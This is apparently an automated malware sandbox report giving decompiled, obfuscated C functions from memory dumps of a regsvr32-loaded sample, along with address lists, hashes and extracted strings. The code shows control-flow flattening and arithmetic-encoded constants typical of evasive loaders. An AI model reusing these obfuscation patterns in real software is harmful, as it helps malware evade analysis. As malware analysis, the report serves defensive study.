					E04B4FECB(_t397, _v1624, _v1688, _v1696, _v1704);
					_t475 =  &(_t475[0x13]);
					_t425 = 0xabcd6f9;
					L8:
					__eflags = _t425 - 0xcc0d361;
				} while (__eflags != 0);
				goto L11;
			}

0x04b517c7
0x04b517ce
0x04b517d0
0x04b517d7
0x04b517d8
0x04b517d9
0x04b517de
0x04b517e9
0x04b517ec
0x04b517f9
0x04b51804
0x04b51809
0x04b51810
0x04b51818
0x04b51820
0x04b51828
0x04b51830
0x04b51844
0x04b51849
0x04b51852
0x04b5185d
0x04b51868
0x04b51873
0x04b5187e
0x04b51886
0x04b5188b
0x04b51893
0x04b5189b
0x04b518a3
0x04b518ab
0x04b518b0
0x04b518b8
0x04b518bd
0x04b518c5
0x04b518d0
0x04b518d8
0x04b518e3
0x04b518eb
0x04b518f3
0x04b518f8
0x04b51900
0x04b51908
0x04b51910
0x04b5191d
0x04b51920
0x04b51924
0x04b5192c
0x04b51934
0x04b5193c
0x04b5194c
0x04b51950
0x04b51958
0x04b51960
0x04b51968
0x04b51970
0x04b51978
0x04b51983
0x04b5198b
0x04b51996
0x04b5199e
0x04b519aa
0x04b519ad
0x04b519b6
0x04b519ba
0x04b519c4
0x04b519cc
0x04b519d4
0x04b519d9
0x04b519de
0x04b519e6
0x04b519ee
0x04b519fc
0x04b51a01
0x04b51a0a
0x04b51a15
0x04b51a1d
0x04b51a22
0x04b51a27
0x04b51a2c
0x04b51a34
0x04b51a47
0x04b51a4a
0x04b51a51
0x04b51a5c
0x04b51a64
0x04b51a6c
0x04b51a74
0x04b51a7c
0x04b51a84
0x04b51a89
0x04b51a93
0x04b51a97
0x04b51a9f
0x04b51aa7
0x04b51ab4
0x04b51ab8
0x04b51ac0
0x04b51ac8
0x04b51ad0
0x04b51ad5
0x04b51add
0x04b51ae5
0x04b51aed
0x04b51af5
0x04b51afd
0x04b51b05
0x04b51b10
0x04b51b1b
0x04b51b26
0x04b51b2e
0x04b51b3a
0x04b51b3d
0x04b51b41
0x04b51b49
0x04b51b51
0x04b51b59
0x04b51b61
0x04b51b66
0x04b51b6b
0x04b51b73
0x04b51b7b
0x04b51b80
0x04b51b85
0x04b51b8d
0x04b51b98
0x04b51ba3
0x04b51bae
0x04b51bb6
0x04b51bbb
0x04b51bbf
0x04b51bc4
0x04b51bca
0x04b51bd7
0x04b51be4
0x04b51be9
0x04b51bee
0x04b51bf6
0x04b51c01
0x04b51c0c
0x04b51c17
0x04b51c22
0x04b51c2d
0x04b51c38
0x04b51c40
0x04b51c48
0x04b51c50
0x04b51c58
0x04b51c60
0x04b51c65
0x04b51c6d
0x04b51c72
0x04b51c7a
0x04b51c82
0x04b51c90
0x04b51c95
0x04b51c9b
0x04b51ca3
0x04b51cab
0x04b51cb7
0x04b51cba
0x04b51cc3
0x04b51cc7
0x04b51ccc
0x04b51cd4
0x04b51ce1
0x04b51cea
0x04b51cee
0x04b51cf3
0x04b51cfb
0x04b51d08
0x04b51d0c
0x04b51d14
0x04b51d19
0x04b51d21
0x04b51d29
0x04b51d31
0x04b51d35
0x04b51d3d
0x04b51d45
0x04b51d50
0x04b51d5b
0x04b51d66
0x04b51d71
0x04b51d71
0x04b51d7f
0x04b51f31
0x04b51f5b
0x04b51f5d
0x04b51d85
0x04b51d8b
0x04b51e67
0x04b51e6c
0x04b51e6f
0x00000000
0x04b51d91
0x04b51d91
0x04b51d93
0x00000000
0x04b51d99
0x04b51d99
0x04b51da2
0x04b51da6
0x04b51dae
0x04b51dbc
0x04b51ddd
0x04b51e03
0x04b51e0d
0x04b51e2d
0x04b51e32
0x04b51e35
0x00000000
0x04b51e35
0x04b51d93
0x04b51d8b
0x04b51f60
0x04b51f6c
0x04b51f6c
0x04b51e76
0x04b51e7f
0x04b51e7f
0x04b51e86
0x04b51e8e
0x04b51e9f
0x04b51ebb
0x04b51ec8
0x04b51ecd
0x04b51eff
0x04b51f19
0x04b51f1e
0x04b51f21
0x04b51f23
0x04b51f23
0x04b51f23
0x00000000

Strings

/;, xrefs: 04B51E7F
oen, xrefs: 04B51C22
}F, xrefs: 04B51B51
>}, xrefs: 04B51996
c, xrefs: 04B51D45
EBr, xrefs: 04B51BB6
OY, xrefs: 04B51B2E

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: /;$>}$EBr$OY$c$oen$}F
API String ID: 0-419207597
Opcode ID: 3e808f6f0be77b5fcc91b813219967503ac65343403627c0b1abbc95f6f08467
Instruction ID: aea040c7b224ee94a70e584e61621addbb8969c5a0f0d6b609bae2edfc791188
Opcode Fuzzy Hash: 3e808f6f0be77b5fcc91b813219967503ac65343403627c0b1abbc95f6f08467
Instruction Fuzzy Hash: B10201B15083809FD764CF25C889A9BFBE5FBC4358F108A1DE2CA96260D7B58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 10008B90, Relevance: 9.1, APIs: 6, Instructions: 83
windowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E10008B90(intOrPtr __ecx) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				struct HDC__* _v120;
				char _v124;
				int _v128;
				int _v132;
				int _v136;
				struct HICON__* _v140;
				intOrPtr _v144;
				void* __ebp;
				signed int _t37;
				int _t40;
				void* _t41;
				void* _t66;
				struct tagRECT* _t82;
				void* _t84;
				void* _t85;
				signed int _t86;

				_t37 =  *0x10057a08; // 0x7d1a16f8
				_v32 = _t37 ^ _t86;
				_v144 = __ecx;
				_t40 = IsIconic( *(_v144 + 0x20));
				_t87 = _t40;
				if(_t40 == 0) {
					_t41 = E1000C473(_t66, _v144, _t84, _t85, __eflags);
				} else {
					_push(_v144);
					E10013247(_t66,  &_v124, _t84, _t85, _t87);
					_t88 =  &_v124;
					if( &_v124 != 0) {
						_v136 = _v120;
					} else {
						_v136 = 0;
					}
					SendMessageA( *(_v144 + 0x20), 0x27, _v136, 0);
					_v128 = GetSystemMetrics(0xb);
					_v132 = GetSystemMetrics(0xc);
					_t82 =  &_v28;
					GetClientRect( *(_v144 + 0x20), _t82);
					asm("cdq");
					_v12 = _v20 - _v28 - _v128 + 1 - _t82 >> 1;
					asm("cdq");
					_v8 = _v16 - _v24 - _v132 + 1 - _t82 >> 1;
					_v140 =  *((intOrPtr*)(_v144 + 0x188));
					_t79 = _v8;
					DrawIcon(_v120, _v12, _v8, _v140);
					_t41 = E1001329B(_t66,  &_v124, _t84, _t85, _t88);
				}
				return E100167D5(_t41, _t66, _v32 ^ _t86, _t79, _t84, _t85);
			}

0x10008b99
0x10008ba0
0x10008ba3
0x10008bb3
0x10008bb9
0x10008bbb
0x10008c94
0x10008bc1
0x10008bc7
0x10008bcb
0x10008bd3
0x10008bd5
0x10008be6
0x10008bd7
0x10008bd7
0x10008bd7
0x10008c01
0x10008c0f
0x10008c1a
0x10008c1d
0x10008c2b
0x10008c3d
0x10008c42
0x10008c51
0x10008c56
0x10008c65
0x10008c72
0x10008c7e
0x10008c87
0x10008c87
0x10008ca6

APIs

IsIconic.USER32 ref: 10008BB3

Part of subcall function 10013247: __EH_prolog3.LIBCMT ref: 1001324E
Part of subcall function 10013247: BeginPaint.USER32(?,?,00000004,1000C48A,?,00000058,10008C99), ref: 1001327A

SendMessageA.USER32 ref: 10008C01
GetSystemMetrics.USER32 ref: 10008C09
GetSystemMetrics.USER32 ref: 10008C14
GetClientRect.USER32(?,?), ref: 10008C2B
DrawIcon.USER32 ref: 10008C7E

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: MetricsSystem$BeginClientDrawH_prolog3IconIconicMessagePaintRectSend
String ID:
API String ID: 1007970657-0
Opcode ID: 34b2481c73848cf5a5b65619b116645cb85ce5e5c475ca315779ed2509392efd
Instruction ID: 92cad86a1f48a06ffd889b7e25b84ff06398f92b7342aaec6ad7b9fd969ef154
Opcode Fuzzy Hash: 34b2481c73848cf5a5b65619b116645cb85ce5e5c475ca315779ed2509392efd
Instruction Fuzzy Hash: BB31F975A00119DFEB24CFA8C995F9EBBB4FF48240F108299E549E7285DE30AA44CF60

Uniqueness

Uniqueness Score: -1.00%

Function 04B377A3, Relevance: 9.1, Strings: 7, Instructions: 330
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E04B377A3(signed int* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v60;
				signed int _v64;
				signed int _v68;
				unsigned int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				void* _t314;
				signed int _t352;
				signed int _t362;
				signed int _t363;
				signed int _t364;
				signed int _t365;
				signed int _t366;
				signed int _t367;
				void* _t370;
				signed int* _t401;
				signed int* _t405;
				void* _t407;

				_t402 = _a12;
				_push(_a12);
				_push(_a8);
				_t401 = __ecx;
				_push(_a4);
				_push(__ecx);
				E04B4FE29(_t314);
				_v100 = 0xaefbe1;
				_t405 =  &(( &_v192)[5]);
				_v100 = _v100 + 0x6b82;
				_t370 = 0xc5526f;
				_t362 = 0x2b;
				_v100 = _v100 / _t362;
				_v100 = _v100 ^ 0x00041443;
				_v80 = 0x1d3414;
				_v80 = _v80 + 0xffffdb02;
				_v80 = _v80 ^ 0x0011ba60;
				_v72 = 0x54a5f8;
				_v72 = _v72 >> 0x10;
				_v72 = _v72 ^ 0x000d0ae3;
				_v136 = 0x274773;
				_t26 =  &_v136; // 0x274773
				_t363 = 0x1a;
				_v136 =  *_t26 * 0x4d;
				_v136 = _v136 + 0xffff9993;
				_v136 = _v136 ^ 0x0bd1637a;
				_v88 = 0xd58b4c;
				_v88 = _v88 + 0xffff1506;
				_v88 = _v88 ^ 0x00d01948;
				_v92 = 0x5e6930;
				_t38 =  &_v92; // 0x5e6930
				_v92 =  *_t38;
				_v92 = _v92 ^ 0x00540f59;
				_v116 = 0x40a51;
				_v116 = _v116 | 0x5ce3fa4e;
				_v116 = _v116 >> 2;
				_v116 = _v116 ^ 0x1737f89e;
				_v108 = 0x7d5bec;
				_v108 = _v108 | 0x0f0c5889;
				_v108 = _v108 + 0xbcf5;
				_v108 = _v108 ^ 0x0f7d2458;
				_v164 = 0x3d5dd8;
				_v164 = _v164 ^ 0x644c870b;
				_v164 = _v164 >> 0xd;
				_v164 = _v164 * 0x7a;
				_v164 = _v164 ^ 0x017eec74;
				_v180 = 0x53df1b;
				_v180 = _v180 / _t363;
				_v180 = _v180 + 0xffff91ff;
				_v180 = _v180 + 0xffff90b6;
				_v180 = _v180 ^ 0x000d2df2;
				_v76 = 0x6cb33c;
				_v76 = _v76 + 0x7c19;
				_v76 = _v76 ^ 0x0065748e;
				_v160 = 0xaee8e0;
				_t364 = 0x3e;
				_v160 = _v160 / _t364;
				_v160 = _v160 + 0x21f3;
				_v160 = _v160 * 0x52;
				_v160 = _v160 ^ 0x00ffda9d;
				_v84 = 0xdaab99;
				_v84 = _v84 >> 0xc;
				_v84 = _v84 ^ 0x000be4ff;
				_v144 = 0x6cc9e4;
				_v144 = _v144 >> 5;
				_v144 = _v144 ^ 0xa5290d0e;
				_v144 = _v144 ^ 0xa52e4d3d;
				_v120 = 0x3bbeb9;
				_v120 = _v120 ^ 0x393aef05;
				_v120 = _v120 + 0x22c7;
				_v120 = _v120 ^ 0x39070acc;
				_v148 = 0xc13163;
				_v148 = _v148 ^ 0x61e09c7e;
				_v148 = _v148 + 0x1cd6;
				_v148 = _v148 ^ 0x612c2d34;
				_v128 = 0x26c56f;
				_v128 = _v128 >> 2;
				_v128 = _v128 | 0xf6250b40;
				_v128 = _v128 ^ 0xf621b77e;
				_v176 = 0xf92ffc;
				_v176 = _v176 << 4;
				_v176 = _v176 ^ 0x602a8fe3;
				_v176 = _v176 >> 7;
				_v176 = _v176 ^ 0x00d9f38d;
				_v124 = 0x433c84;
				_v124 = _v124 + 0xffff4128;
				_v124 = _v124 ^ 0x1ed7562a;
				_v124 = _v124 ^ 0x1e92a094;
				_v132 = 0x6b8ec6;
				_v132 = _v132 ^ 0x28d18ae0;
				_t365 = 0x6a;
				_v132 = _v132 * 0x7b;
				_v132 = _v132 ^ 0x9158c057;
				_v104 = 0x1fefeb;
				_v104 = _v104 >> 0xf;
				_v104 = _v104 + 0xffff5efe;
				_v104 = _v104 ^ 0xfff4cbde;
				_v168 = 0xc1bc7b;
				_v168 = _v168 >> 3;
				_v168 = _v168 << 7;
				_v168 = _v168 * 0x7d;
				_v168 = _v168 ^ 0xe998ae80;
				_v64 = 0x9d5223;
				_v64 = _v64 | 0x29ada36c;
				_v64 = _v64 ^ 0x29b66376;
				_v184 = 0x42d2c5;
				_v184 = _v184 + 0xffffd8f9;
				_v184 = _v184 | 0x10a03a14;
				_v184 = _v184 << 8;
				_v184 = _v184 ^ 0xe2b073c1;
				_v192 = 0xa502eb;
				_v192 = _v192 ^ 0xb81d0436;
				_v192 = _v192 >> 0xd;
				_v192 = _v192 / _t365;
				_v192 = _v192 ^ 0x000463de;
				_v172 = 0x9c405d;
				_v172 = _v172 >> 6;
				_v172 = _v172 ^ 0x75940441;
				_v172 = _v172 + 0xd268;
				_v172 = _v172 ^ 0x759b0547;
				_v156 = 0x9f3fdd;
				_v156 = _v156 >> 3;
				_v156 = _v156 << 9;
				_v156 = _v156 >> 0xd;
				_v156 = _v156 ^ 0x000ada21;
				_v188 = 0xfbaf85;
				_v188 = _v188 | 0xf8737d3a;
				_t366 = 0x3c;
				_v188 = _v188 / _t366;
				_v188 = _v188 ^ 0x0422aead;
				_v112 = 0x7705bd;
				_v112 = _v112 | 0xb4ba0e14;
				_v112 = _v112 * 0x43;
				_v112 = _v112 ^ 0x5ec93514;
				_v96 = 0xe3e42a;
				_v96 = _v96 ^ 0x25c7ee45;
				_v96 = _v96 ^ 0x252c54ca;
				_v68 = 0xae646d;
				_v68 = _v68 + 0xcc0;
				_v68 = _v68 ^ 0x00a4113a;
				_v140 = 0x4c7529;
				_t367 = 0x73;
				_v140 = _v140 / _t367;
				_v140 = _v140 | 0x6ffaa740;
				_v140 = _v140 ^ 0x6ff9ac12;
				_v152 = 0xafca7f;
				_v152 = _v152 + 0xfffffd29;
				_v152 = _v152 + 0xad57;
				_v152 = _v152 + 0x26e2;
				_v152 = _v152 ^ 0x00ba4152;
				goto L1;
				do {
					while(1) {
						L1:
						_t407 = _t370 - 0x696b508;
						if(_t407 > 0) {
							break;
						}
						if(_t407 == 0) {
							_t401[1] = L04B3F369(_t402);
							_t370 = 0x4c1a8a5;
							continue;
						} else {
							if(_t370 == 0xc5526f) {
								_t370 = 0x696b508;
								 *_t401 =  *_t401 & 0x00000000;
								_t401[1] = _v100;
								continue;
							} else {
								if(_t370 == 0x1aa419f) {
									L04B40A90(_v64, _v184, _v192,  &_v60, _v172,  *((intOrPtr*)(_t402 + 0xc)));
									_t405 =  &(_t405[4]);
									_t370 = 0x68c33a9;
									continue;
								} else {
									if(_t370 == 0x4c1a8a5) {
										_push(_t370);
										_push(_t370);
										_t352 = E04B3C5D8(_t401[1]);
										_t405 =  &(_t405[3]);
										 *_t401 = _t352;
										__eflags = _t352;
										if(__eflags != 0) {
											_t370 = 0x8344534;
											continue;
										}
									} else {
										if(_t370 == 0x642ef10) {
											L04B4CAD5(_v108, _v164, __eflags, _v180, _t402 + 0x4c,  &_v60);
											_t405 =  &(_t405[3]);
											_t370 = 0x7d262d1;
											continue;
										} else {
											if(_t370 != 0x68c33a9) {
												goto L25;
											} else {
												L04B40A90(_v156, _v188, _v112,  &_v60, _v96,  *((intOrPtr*)(_t402 + 8)));
												_t405 =  &(_t405[4]);
												_t370 = 0x6a3d126;
												continue;
											}
										}
									}
								}
							}
						}
						goto L26;
					}
					__eflags = _t370 - 0x6a3d126;
					if(__eflags == 0) {
						L04B4CAD5(_v68, _v140, __eflags, _v152, _t402 + 0x2c,  &_v60);
						_t405 =  &(_t405[3]);
						_t370 = 0x2431b15;
						goto L25;
					} else {
						__eflags = _t370 - 0x7d262d1;
						if(_t370 == 0x7d262d1) {
							L04B40A90(_v76, _v160, _v84,  &_v60, _v144,  *((intOrPtr*)(_t402 + 0x58)));
							_t405 =  &(_t405[4]);
							_t370 = 0xabb5672;
							goto L1;
						} else {
							__eflags = _t370 - 0x8344534;
							if(_t370 == 0x8344534) {
								L04B322A6(_t401, _v92,  &_v60, _v116);
								_t405 =  &(_t405[2]);
								_t370 = 0x642ef10;
								goto L1;
							} else {
								__eflags = _t370 - 0x94f1f5a;
								if(_t370 == 0x94f1f5a) {
									L04B40A90(_v124, _v132, _v104,  &_v60, _v168,  *((intOrPtr*)(_t402 + 0x38)));
									_t405 =  &(_t405[4]);
									_t370 = 0x1aa419f;
									goto L1;
								} else {
									__eflags = _t370 - 0xabb5672;
									if(_t370 != 0xabb5672) {
										goto L25;
									} else {
										L04B40A90(_v120, _v148, _v128,  &_v60, _v176,  *((intOrPtr*)(_t402 + 0x10)));
										_t405 =  &(_t405[4]);
										_t370 = 0x94f1f5a;
										goto L1;
									}
								}
							}
						}
					}
					break;
					L25:
					__eflags = _t370 - 0x2431b15;
				} while (__eflags != 0);
				L26:
				__eflags =  *_t401;
				_t313 =  *_t401 != 0;
				__eflags = _t313;
				return 0 | _t313;
			}

0x04b377ac
0x04b377b4
0x04b377b5
0x04b377bc
0x04b377be
0x04b377c6
0x04b377c7
0x04b377cc
0x04b377d7
0x04b377da
0x04b377e8
0x04b377ef
0x04b377f4
0x04b377fa
0x04b37802
0x04b3780d
0x04b37818
0x04b37823
0x04b3782e
0x04b37836
0x04b37841
0x04b37849
0x04b3784e
0x04b37851
0x04b37855
0x04b3785d
0x04b37865
0x04b3786d
0x04b37875
0x04b3787d
0x04b37885
0x04b37889
0x04b3788d
0x04b37895
0x04b3789d
0x04b378a5
0x04b378aa
0x04b378b2
0x04b378ba
0x04b378c2
0x04b378ca
0x04b378d2
0x04b378da
0x04b378e2
0x04b378ec
0x04b378f0
0x04b378f8
0x04b37908
0x04b3790c
0x04b37914
0x04b3791c
0x04b37924
0x04b3792f
0x04b3793a
0x04b37945
0x04b37951
0x04b37954
0x04b37958
0x04b37965
0x04b37969
0x04b37971
0x04b37979
0x04b3797e
0x04b37988
0x04b37990
0x04b37995
0x04b3799d
0x04b379a5
0x04b379ad
0x04b379b5
0x04b379bd
0x04b379c5
0x04b379cd
0x04b379d5
0x04b379dd
0x04b379e5
0x04b379ed
0x04b379f2
0x04b379fa
0x04b37a02
0x04b37a0a
0x04b37a0f
0x04b37a17
0x04b37a1c
0x04b37a24
0x04b37a2c
0x04b37a34
0x04b37a3c
0x04b37a44
0x04b37a4c
0x04b37a5b
0x04b37a5e
0x04b37a62
0x04b37a6a
0x04b37a72
0x04b37a77
0x04b37a7f
0x04b37a87
0x04b37a8f
0x04b37a94
0x04b37a9e
0x04b37aa2
0x04b37aaa
0x04b37ab5
0x04b37ac0
0x04b37acb
0x04b37ad3
0x04b37adb
0x04b37ae3
0x04b37ae8
0x04b37af0
0x04b37af8
0x04b37b00
0x04b37b0d
0x04b37b11
0x04b37b19
0x04b37b21
0x04b37b26
0x04b37b2e
0x04b37b36
0x04b37b3e
0x04b37b46
0x04b37b4b
0x04b37b50
0x04b37b55
0x04b37b5d
0x04b37b65
0x04b37b71
0x04b37b74
0x04b37b78
0x04b37b80
0x04b37b88
0x04b37b95
0x04b37b9b
0x04b37ba8
0x04b37bb0
0x04b37bb8
0x04b37bc0
0x04b37bcb
0x04b37bd6
0x04b37be1
0x04b37bef
0x04b37bf7
0x04b37bfb
0x04b37c03
0x04b37c0b
0x04b37c13
0x04b37c1b
0x04b37c23
0x04b37c2b
0x04b37c2b
0x04b37c33
0x04b37c33
0x04b37c33
0x04b37c33
0x04b37c35
0x00000000
0x00000000
0x04b37c3b
0x04b37d45
0x04b37d48
0x00000000
0x04b37c41
0x04b37c47
0x04b37d31
0x04b37d33
0x04b37d36
0x00000000
0x04b37c4d
0x04b37c53
0x04b37d1b
0x04b37d20
0x04b37d23
0x00000000
0x04b37c59
0x04b37c5f
0x04b37cdf
0x04b37ce0
0x04b37ce4
0x04b37ce9
0x04b37cec
0x04b37cee
0x04b37cf0
0x04b37cf6
0x00000000
0x04b37cf6
0x04b37c61
0x04b37c67
0x04b37cb7
0x04b37cbc
0x04b37cbf
0x00000000
0x04b37c69
0x04b37c6f
0x00000000
0x04b37c75
0x04b37c90
0x04b37c95
0x04b37c98
0x00000000
0x04b37c98
0x04b37c6f
0x04b37c67
0x04b37c5f
0x04b37c53
0x04b37c47
0x00000000
0x04b37c3b
0x04b37d52
0x04b37d58
0x04b37e4e
0x04b37e53
0x04b37e56
0x00000000
0x04b37d5e
0x04b37d5e
0x04b37d64
0x04b37e21
0x04b37e26
0x04b37e29
0x00000000
0x04b37d6a
0x04b37d6a
0x04b37d6c
0x04b37dee
0x04b37df3
0x04b37df6
0x00000000
0x04b37d6e
0x04b37d6e
0x04b37d74
0x04b37dca
0x04b37dcf
0x04b37dd2
0x00000000
0x04b37d76
0x04b37d76
0x04b37d7c
0x00000000
0x04b37d82
0x04b37d9d
0x04b37da2
0x04b37da5
0x00000000
0x04b37da5
0x04b37d7c
0x04b37d74
0x04b37d6c
0x04b37d64
0x00000000
0x04b37e5b
0x04b37e5b
0x04b37e5b
0x04b37e67
0x04b37e69
0x04b37e6e
0x04b37e6e
0x04b37e78

Strings

4-,a, xrefs: 04B379DD
0i^, xrefs: 04B37885
)uL, xrefs: 04B37BE1
*, xrefs: 04B37BA8
sG', xrefs: 04B37849
&, xrefs: 04B37C23
[}, xrefs: 04B378B2

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: )uL$*$0i^$4-,a$sG'$&$[}
API String ID: 0-4036371101
Opcode ID: e280074acee194a8a4af21785d26579025f4db8ac7bfb2e7628ff9284e72021d
Instruction ID: 0122845092241a9a08aaadfef23489bca8acdf71385ea4e1c6b9d3354203c686
Opcode Fuzzy Hash: e280074acee194a8a4af21785d26579025f4db8ac7bfb2e7628ff9284e72021d
Instruction Fuzzy Hash: BAF133B1508384DFD368CF22C489A5BFBF1FB84748F50891DE69A86260D7B59949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 04B4DC71, Relevance: 9.0, Strings: 7, Instructions: 237
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E04B4DC71() {
				signed int _v4;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				void* _t246;
				intOrPtr* _t248;
				signed int _t254;
				intOrPtr _t255;
				intOrPtr* _t256;
				signed int _t257;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t262;
				void* _t263;
				void* _t290;
				signed int* _t294;

				_t294 =  &_v108;
				_v28 = 0x1aa6a3;
				_v28 = _v28 >> 4;
				_v28 = _v28 ^ 0x8001aa6b;
				_v68 = 0xf966b1;
				_v68 = _v68 | 0xf5f58fdd;
				_v4 = 0;
				_t290 = 0xa5173af;
				_t257 = 0x26;
				_v68 = _v68 / _t257;
				_v68 = _v68 ^ 0x0679357b;
				_v108 = 0xb8ff00;
				_v108 = _v108 | 0x28c12dd3;
				_t258 = 0x42;
				_v108 = _v108 / _t258;
				_v108 = _v108 + 0x2548;
				_v108 = _v108 ^ 0x0093f641;
				_v80 = 0x4a20cb;
				_v80 = _v80 | 0x50657e73;
				_v80 = _v80 >> 7;
				_v80 = _v80 ^ 0x00ac2c39;
				_v84 = 0x6237d1;
				_v84 = _v84 ^ 0x87c50ead;
				_v84 = _v84 << 4;
				_v84 = _v84 ^ 0x7a73b039;
				_v88 = 0x617a8;
				_v88 = _v88 << 0xa;
				_v88 = _v88 >> 0xc;
				_v88 = _v88 ^ 0x00004866;
				_v96 = 0x113f2;
				_v96 = _v96 + 0x334b;
				_v96 = _v96 << 0xb;
				_v96 = _v96 ^ 0x0285e17a;
				_v96 = _v96 ^ 0x08b84672;
				_v60 = 0x4bd9b6;
				_v60 = _v60 ^ 0x6ba7848f;
				_v60 = _v60 | 0xa40fa4df;
				_v60 = _v60 ^ 0xefe49c55;
				_v100 = 0xb12c48;
				_v100 = _v100 >> 0xf;
				_v100 = _v100 ^ 0x0d420031;
				_t259 = 0x33;
				_v100 = _v100 / _t259;
				_v100 = _v100 ^ 0x004184fb;
				_v104 = 0x387c2e;
				_v104 = _v104 << 5;
				_t260 = 0x72;
				_v104 = _v104 / _t260;
				_v104 = _v104 >> 0xc;
				_v104 = _v104 ^ 0x0003fa0e;
				_v64 = 0x9254d3;
				_v64 = _v64 ^ 0xec8ec683;
				_v64 = _v64 + 0xffff5a55;
				_v64 = _v64 ^ 0xec1fa99d;
				_v72 = 0xb608b;
				_v72 = _v72 + 0xffffc85a;
				_t261 = 0x43;
				_v72 = _v72 / _t261;
				_v72 = _v72 ^ 0x00012617;
				_v32 = 0x2b47af;
				_t262 = 0x73;
				_t254 = _v4;
				_v32 = _v32 / _t262;
				_v32 = _v32 ^ 0x0007dbbc;
				_v76 = 0xa2cc58;
				_v76 = _v76 * 0x79;
				_v76 = _v76 + 0x1556;
				_v76 = _v76 ^ 0x4cf4e816;
				_v36 = 0x411f8a;
				_v36 = _v36 ^ 0x039a7593;
				_v36 = _v36 ^ 0x03d0076c;
				_v48 = 0x32f559;
				_v48 = _v48 + 0x88cf;
				_v48 = _v48 >> 4;
				_v48 = _v48 ^ 0x000c1178;
				_v92 = 0xe53134;
				_v92 = _v92 + 0xffffd6c4;
				_v92 = _v92 + 0xfffff637;
				_v92 = _v92 ^ 0x9e819fd3;
				_v92 = _v92 ^ 0x9e661668;
				_v52 = 0x962c48;
				_v52 = _v52 + 0x54df;
				_v52 = _v52 << 4;
				_v52 = _v52 ^ 0x096c20fe;
				_v56 = 0x38983;
				_v56 = _v56 * 0x7b;
				_v56 = _v56 ^ 0x1e2e8742;
				_v56 = _v56 ^ 0x1f9fc20c;
				_v20 = 0x39c3;
				_v20 = _v20 ^ 0xdc0c04ea;
				_v20 = _v20 ^ 0xdc0d303f;
				_v44 = 0xdd799f;
				_v44 = _v44 + 0xffffa96c;
				_v44 = _v44 >> 0xc;
				_v44 = _v44 ^ 0x0003bcd5;
				_v24 = 0x7b2b38;
				_v24 = _v24 * 0x48;
				_v24 = _v24 ^ 0x22aaeece;
				_v40 = 0x38897c;
				_v40 = _v40 >> 0xe;
				_v40 = _v40 | 0xf4a0afb0;
				_v40 = _v40 ^ 0xf4ac49e4;
				_v12 = 0x92ab49;
				_v12 = _v12 ^ 0x4b1e6875;
				_v12 = _v12 ^ 0x4b80c344;
				_v16 = 0x5228cc;
				_v16 = _v16 | 0xaae3d00d;
				_v16 = _v16 ^ 0xaaf963f0;
				while(1) {
					L1:
					_t263 = 0x5c;
					while(1) {
						_t246 = 0xc02063;
						do {
							L3:
							while(_t290 != 0x13579) {
								if(_t290 == _t246) {
									_t248 = E04B5298D(_v20, _v44, _v24, _v8, _t254);
									_t294 =  &(_t294[3]);
									__eflags = _t248;
									_t290 = 0x13579;
									_v4 = 0 | __eflags == 0x00000000;
									goto L1;
								} else {
									if(_t290 == 0x79b4c83) {
										_push(_v88);
										_push(_v84);
										_push(_v80);
										__eflags = E04B32DEA(_v96,  &_v8, _v60, 0x4b310a0, _v28, _v100, 0x4b310a0, 0x4b310a0, _v104, _v64, 0x4b310a0, 0x4b310a0, _v68, _v72, _v32, _v76, _v36, E04B4E1F8(0x4b310a0, _v108, __eflags));
										_t290 =  ==  ? 0xc02063 : 0x61b9dc3;
										E04B4FECB(_t249, _v48, _v92, _v52, _v56);
										_t294 =  &(_t294[0x16]);
										L16:
